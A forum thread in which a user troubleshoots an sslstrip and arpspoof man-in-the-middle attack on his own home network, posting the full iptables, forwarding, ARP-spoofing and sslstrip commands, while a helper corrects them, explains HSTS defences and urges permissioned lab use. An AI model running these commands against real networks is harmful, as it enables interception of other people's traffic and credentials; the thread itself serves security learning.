Linux - Wireless NetworkingThis forum is for the discussion of wireless networking in Linux.
Notices
Welcome to LinuxQuestions.org, a friendly and active Linux Community.
You are currently viewing LQ as a guest. By joining our community you will have the ability to post topics, receive our newsletter, use the advanced search, subscribe to threads and access many other special features. Registration is quick, simple and absolutely free. Join our community today!
Note that registered members see fewer ads, and ContentLink is completely disabled once you log in.
If you have any problems with the registration process or your account login, please contact us. If you need to reset your password, click here.
Having a problem logging in? Please visit this page to clear all LQ-related cookies.
Get a virtual cloud desktop with the Linux distro that you want in less than five minutes with Shells! With over 10 pre-installed distros to choose from, the worry-free installation life is here! Whether you are a digital nomad or just looking for flexibility, Shells can put your Linux machine on the device that you want to use.
Exclusive for LQ members, get up to 45% off per month. Click here for more info.
Hi
I'm trying to study sslstrip.
my attacker machine is a laptop running fedora 25, using wireless itf called: wlo1
my victim is windows 10 machine. ip=10.0.0.4
router ip = 10.0.0.138
I run the following on terminal 1:
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -I INPUT 1 -p tcp --dport 8080 -j ACCEPT
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 -i wlo1
sslstrip -l 8080 -a
I run the following on terminal 2:
arpspoof -i wlo1 -t 10.0.0.138 -r 10.0.0.4
I run the following on terminal 3:
arpspoof -i wlo1 -r 10.0.0.138 -t 10.0.0.4
I run the following on terminal 4:
tail -f sslstrip.log
*** more info
[test@localhost apps]$ sudo iptables -L INPUT
[sudo] password for test:
Chain INPUT (policy ACCEPT)
target prot opt source destination
ACCEPT tcp -- anywhere anywhere tcp dpt:webcache
ACCEPT udp -- anywhere anywhere udp dpt:domain
ACCEPT tcp -- anywhere anywhere tcp dpt:domain
ACCEPT udp -- anywhere anywhere udp dpt:bootps
ACCEPT tcp -- anywhere anywhere tcp dpt:bootps
ACCEPT all -- anywhere anywhere ctstate RELATED,ESTABLISHED
ACCEPT all -- anywhere anywhere
INPUT_direct all -- anywhere anywhere
INPUT_ZONES_SOURCE all -- anywhere anywhere
INPUT_ZONES all -- anywhere anywhere
DROP all -- anywhere anywhere ctstate INVALID
REJECT all -- anywhere anywhere reject-with icmp-host-prohibited
I run the following on terminal 2:
arpspoof -i wlo1 -t 10.0.0.138 -r 10.0.0.4
I run the following on terminal 3:
arpspoof -i wlo1 -r 10.0.0.138 -t 10.0.0.4
The -r switch makes it so you do not need a second terminal. It tells arpspoof to poison both ways automatically. So you only need to run it once. Be certain that one IP is the router/gateway of your LAN (or virtual network) and that the other is designated as the target with -t. So if 10.0.0.4 is the gateway, run this:
Code:
arpspoof -i wlo1 -t 10.0.0.138 -r 10.0.0.4
Using the command twice is redundant and is causing your machine to spam ARP requests, which can reliably take down any machine on a home LAN.
I also suggest that your flush all your firewall rules and start fresh with ip forwarding and port redirects in case your existing firewall rules are interfering with the traffic.
Keep in mind that sslstrip can get you into a lot of trouble. Be sure you use it against machines on your own network, which are running software that you made or is designated for ethical penetration testing. If it is not your own network/machines, be certain you have permission.
hi mralk3,
thanks a lot for your answer. I did flush all iptables rules and the browser no longer looses connectivity - i can browse freely.
But, now i face the real issue: tail -f sslstrip.log does not show anything.
BTW, doing arp -a on the windows machine shows that the physical address of the router (10.0.0.138) resembles that of the attacker machine (10.0.0.16).
oops!
as soon as i posted the reply i saw it on the sslstrip.log !
so it works for linuxquestions.org and does not work for any other site i tried. should i look only for non-https sites? i thought (probably wrongly) that sslstrip should strip https to http and let me see the converstaion with https sites. was i wrong? (most sites use https, so there is not much to do with sslstrip if i'm limited to non-https sites) ...
Some sites have protections against SSLStrip. Some targets (victims) also have protections, such as the browser add ons like "HTTPS Everywhere". If a site is purely served using SSL/TLS, and nothing is clear text, it is difficult, if not impossible to do an SSL/TLS downgrade attack. This is also the case if a site deploys "HTTP Strict Transport Security", or HSTS. For more information google the terms "protections against sslstrip".
Short answer: SSLstrip doesn't always work these days due to sites on the web using better security practices.
i understand. when I removed google.com from HSTS list on chrome, sslstrip intercepted successfuly.
thanks a lot, mralk3.
Glad to help. Be careful with how you use sslstrip. I recommend setting up a virtual lab for your testing so you can play, as well as stay out of trouble. Damn Vulnerable Linux and Metasploitable are great for learning this stuff.
LinuxQuestions.org is looking for people interested in writing
Editorials, Articles, Reviews, and more. If you'd like to contribute
content, let us know.
sslstrip & arpspoof
